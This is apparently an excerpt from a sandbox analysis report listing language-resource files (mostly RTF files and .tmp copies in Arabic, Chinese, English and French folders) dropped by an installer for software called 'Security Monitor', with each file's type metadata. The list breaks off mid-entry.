C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-2H716.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-3QCNE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-68BJ6.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-9GNLO.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-9TPU5.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-9VDM7.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-BA9LB.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-BBQLO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-G0KKP.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-IFC14.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-KDVH2.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-LH6K4.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-PIKCP.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-SFIBL.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-T1N6N.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-T6FS0.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\is-V9N24.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\arabic\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-03BEV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-1K1NO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-48PRA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-7E52I.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-7MSDN.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-81LEV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-8Q5FL.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-8U7RP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-IF3SM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-JEGPV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-KBQLB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-NFUO7.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-R7IQ8.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-S3KE3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-TT07B.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-UBGMU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\is-UHK7A.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\chinese\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english.lng (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\360_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\AVG_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avast_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Avira_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\Kaspersky_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\McAfee_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\eset_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-0B59J.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-1TMUB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-2G1NE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-4N4S2.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-70E45.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-8B9O1.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-98KDV.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-D2U4H.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-DR3T8.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-E85N2.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-ESSPP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-FS18O.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-GUSFS.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-H96RC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-IA9OG.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-J4NCC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-KGCB5.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-M3HK4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-M9AVQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-MI82S.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-NI3R1.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-PU13U.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-R9EQA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-SJSEG.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\is-U1D7G.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\norton_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\english\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-0KCCD.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-2GUUI.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-36UM7.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-3H5BQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-3NTK1.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-3QN2R.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-8MK2C.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-D3DJK.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-E89GH.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-F1ES7.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-FO77V.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-FU8J8.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-H76HF.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-KLJRQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-OIOC3.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-PR69D.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\is-RQET0.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\sound.rtf (copy)
